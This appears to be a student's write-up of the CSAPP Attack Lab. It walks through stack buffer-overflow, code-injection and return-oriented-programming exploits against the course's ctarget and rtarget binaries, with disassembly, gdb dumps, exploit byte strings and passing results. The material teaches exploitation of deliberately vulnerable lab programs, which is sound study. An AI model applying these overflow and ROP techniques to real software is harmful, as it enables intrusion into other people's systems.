  • 【CSAPP】Attack Lab实验笔记





    0000000000401968 <test>:
      401968:	48 83 ec 08          	sub    $0x8,%rsp                  # rsp was 16n+8 after the caller's call pushed its return address; -8 makes it 16-aligned at the callq sites below (SysV)
      40196c:	b8 00 00 00 00       	mov    $0x0,%eax                  # eax = 0 before the call; getbuf (below) does not read it
      401971:	e8 32 fe ff ff       	callq  4017a8 <getbuf>            # pushes 0x401976 as return address -- the stack slot that getbuf's unbounded Gets() can overwrite (see the gdb dump below)
      401976:	89 c2                	mov    %eax,%edx                  # edx = getbuf() result, 3rd printf argument
      401978:	be 88 31 40 00       	mov    $0x403188,%esi             # esi = format string, 2nd argument
      40197d:	bf 01 00 00 00       	mov    $0x1,%edi                  # edi = 1, __printf_chk flag argument
      401982:	b8 00 00 00 00       	mov    $0x0,%eax                  # al = 0: variadic call with no vector-register arguments (SysV rule)
      401987:	e8 64 f4 ff ff       	callq  400df0 <__printf_chk@plt>
      40198c:	48 83 c4 08          	add    $0x8,%rsp                  # undo the alignment adjust
      401990:	c3                   	retq   
      401991:	90                   	nop
    00000000004017a8 <getbuf>:
      4017a8:	48 83 ec 28          	sub    $0x28,%rsp                 # 40-byte frame: the buffer starts at rsp, the saved return address sits at rsp+0x28
      4017ac:	48 89 e7             	mov    %rsp,%rdi                  # rdi = buf; note that no length is passed
      4017af:	e8 8c 02 00 00       	callq  401a40 <Gets>              # Gets() gets only the pointer, so an input longer than 40 bytes runs into the return address; there is no canary check in this frame either -- a size-bounded read (fgets with sizeof buf) would close the hole
      4017b4:	b8 01 00 00 00       	mov    $0x1,%eax                  # return 1
      4017b9:	48 83 c4 28          	add    $0x28,%rsp
      4017bd:	c3                   	retq                              # pops whatever is now at rsp+0x28 -- after an overflow, the attacker-chosen value
      4017be:	90                   	nop
      4017bf:	90                   	nop
    00000000004017c0 <touch1>:
      4017c0:	48 83 ec 08          	sub    $0x8,%rsp                  # realign rsp to 16 for the calls below
      4017c4:	c7 05 0e 2d 20 00 01 	movl   $0x1,0x202d0e(%rip)        # 6044dc <vlevel>  -- vlevel = 1 (part of the validation protocol)
      4017cb:	00 00 00 
      4017ce:	bf c5 30 40 00       	mov    $0x4030c5,%edi             # edi = string printed by puts (presumably the "Touch1!: You called touch1()" line seen in the run below)
      4017d3:	e8 e8 f4 ff ff       	callq  400cc0 <puts@plt>
      4017d8:	bf 01 00 00 00       	mov    $0x1,%edi                  # validate(1)
      4017dd:	e8 ab 04 00 00       	callq  401c8d <validate>
      4017e2:	bf 00 00 00 00       	mov    $0x0,%edi                  # exit(0) -- does not return, which is why no epilogue/ret follows
      4017e7:	e8 54 f6 ff ff       	callq  400e40 <exit@plt>

    在0x4017b9处打个断点,这时候创建一个内容为This is a test str.的文本文件in.txt,在gdb里用set args -qi in.txt把它指定为输入源.让程序运行到断点,查看栈帧信息

    (gdb) x/60xb 0x5561dc78
    0x5561dc78:     0x54    0x68    0x69    0x73    0x20    0x69    0x73    0x20
    0x5561dc80:     0x61    0x20    0x74    0x65    0x73    0x74    0x20    0x73
    0x5561dc88:     0x74    0x72    0x2e    0x00    0x00    0x00    0x00    0x00
    0x5561dc90:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
    0x5561dc98:     0x00    0x60    0x58    0x55    0x00    0x00    0x00    0x00
    0x5561dca0:     0x76    0x19    0x40    0x00    0x00    0x00    0x00    0x00
    0x5561dca8:     0x09    0x00    0x00    0x00    0x00    0x00    0x00    0x00
    0x5561dcb0:     0x24    0x1f    0x40    0x00
    (gdb) x/s 0x5561dc78
    0x5561dc78:     "This is a test str."

    这里面的0x76 0x19 0x40对应的就是返回地址(0x401976,即test中callq getbuf的下一条指令),我们的目标就是把它修改为touch1入口的地址0x004017c0.按小端序写成字节序列就是0xc0 0x17 0x40 0x00,注意字节顺序是倒过来的.

    54 54 54 54 54 54 54 54
    54 54 54 54 54 54 54 54
    54 54 54 54 54 54 54 54
    54 54 54 54 54 54 54 54
    54 54 54 54 54 54 54 54
    c0 17 40 00 00 00 00


    ./hex2raw < exploit.txt > raw.txt


    ./ctarget -qi raw.txt
    Cookie: 0x59b997fa
    Touch1!: You called touch1()
    Valid solution for level 1 with target ctarget
    PASS: Would have posted the following:
    	user id	bovik
    	course	15213-f15
    	lab	attacklab
    	result	1:PASS:0xffffffff:ctarget:1:54 54 ..... 54 C0 17 40 00 00 00 00 

    level 2


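    /* Level-2 target: expects the cookie value as its single argument.
     * Handout excerpt restored from the garbled listing (braces and the
     * "\n" escapes were lost); the code that follows the two branches --
     * by analogy with touch1's disassembly above, validation and exit --
     * is not reproduced on this page. */
    void touch2(unsigned val)
    {
        vlevel = 2;       /* Part of validation protocol */
        if (val == cookie) {
            printf("Touch2!: You called touch2(0x%.8x)\n", val);
        } else {
            printf("Misfire: You called touch2(0x%.8x)\n", val);
        }
    }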


    mov cookie,%rdi
    pushq touch2


    movq $0x59b997fa,%rdi
    pushq $0x4017ec


    gcc -c ex.s
    objdump -d ex.o > ex_dump.txt


    ex.o:     文件格式 elf64-x86-64
    Disassembly of section .text:
    0000000000000000 <.text>:
       0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi           # 13 bytes of position-independent code, placed in getbuf's buffer and entered via the overwritten return address
       7:	68 ec 17 40 00       	pushq  $0x4017ec                  # pushed target = touch2 (0x4017ec); the trailing ret transfers there
       c:	c3                                                     # this only works because ctarget's stack is executable and at a fixed address -- the rtarget levels later on the page cannot run injected code and must reuse existing code instead


    48 c7 c7 fa 97 b9 59 68
    ec 17 40 00 c3 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    78 dc 61 55 00 00 00 00


    ./hex2raw < exploit.txt > raw.txt
    ./ctarget -qi raw.txt
    Cookie: 0x59b997fa
    Touch2!: You called touch2(0x59b997fa)
    Valid solution for level 2 with target ctarget
    PASS: Would have posted the following:
    	user id	bovik
    	course	15213-f15
    	lab	attacklab
    	result	1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68
     EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 

    level 3


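    /* Compare string to hex representation of unsigned value.
     * Returns 1 when sval equals the 8-digit lowercase hex form of val
     * (compared over 9 bytes, i.e. including the terminator), else 0.
     * Handout excerpt restored from the garbled listing (braces were lost). */
    int hexmatch(unsigned val, char *sval)
    {
        char cbuf[110];
        /* Make position of check string unpredictable */
        char *s = cbuf + random() % 100;
        /* offset <= 99 and "%.8x" emits 8 digits + NUL = 9 bytes, so the write
         * ends at cbuf[107] at most; the bound is passed explicitly anyway */
        snprintf(s, sizeof(cbuf) - (size_t)(s - cbuf), "%.8x", val);
        return strncmp(sval, s, 9) == 0;
    }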
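    /* Level-3 target: expects a pointer to the cookie's 8-digit hex string.
     * Handout excerpt restored from the garbled listing (braces and the
     * \" and \n escapes were lost); the code that follows the two branches
     * -- by analogy with touch1's disassembly above, validation and exit --
     * is not reproduced on this page. */
    void touch3(char *sval)
    {
        vlevel = 3;       /* Part of validation protocol */
        if (hexmatch(cookie, sval)) {
            printf("Touch3!: You called touch3(\"%s\")\n", sval);
        } else {
            printf("Misfire: You called touch3(\"%s\")\n", sval);
        }
    }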

    有了第二关的经验,这关就很简单了.先仿照hexmatch求出cookie对应的十六进制字符串"59b997fa",即字节35 39 62 39 39 37 66 61 00(末尾的00是字符串结束符),然后把它塞到栈里,再把这个地址塞进rdi里.这里我把它塞到了0x5561dca8

    movq $0x5561dca8,%rdi
    pushq $0x4018fa
    48 c7 c7 a8 dc 61 55 68
    fa 18 40 00 c3 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    78 dc 61 55 00 00 00 00
    35 39 62 39 39 37 66 61


    Cookie: 0x59b997fa
    Touch3!: You called touch3("59b997fa")
    Valid solution for level 3 with target ctarget
    PASS: Would have posted the following:
    	user id	bovik
    	course	15213-f15
    	lab	attacklab
    	result	1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 
    FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 
    62 39 39 37 66 61 00 

    level 4


    movq $cookie,%rdi
    ret touch2


    popq %reg1
    movq %reg1,%reg2
    movq %reg2,%reg3
    movq %regN,%rdi
    ret touchw


    movq %rax,%rdi
    movq %rsp,%rax
    popq %rax


    popq rax => movq rax,rdi


    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    ab 19 40 00 00 00 00 00
    fa 97 b9 59 00 00 00 00
    c5 19 40 00 00 00 00 00
    ec 17 40 00 00 00 00 00


    Cookie: 0x59b997fa
    Touch2!: You called touch2(0x59b997fa)
    Valid solution for level 2 with target rtarget
    PASS: Would have posted the following:
    	user id	bovik
    	course	15213-f15
    	lab	attacklab
    	result	1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
     00 00 00 00 00 00 00 00 00 00 00 AB 19 40 00 00 00 00 00 FA 97
     B9 59 00 00 00 00 C5 19 40 00 00 00 00 00 EC 17 40 00 00 00 00
     00 00 

    level 5

    这一关就是体力活了,如讲义里所讲,这关并没有出现啥新机制,只是复杂版的level 4,不做也行.
    随机栈虽然厉害,但只要通过ROP拿到了%rsp,照样是能被破解的.上一关我们就提到了movq %rsp,%rax,再加上还有个lea (%rdi,%rsi,1),%rax,以及三十多个mov,所以解题思路就很明显了.

  • 原文地址:https://www.cnblogs.com/kangyupl/p/13057508.html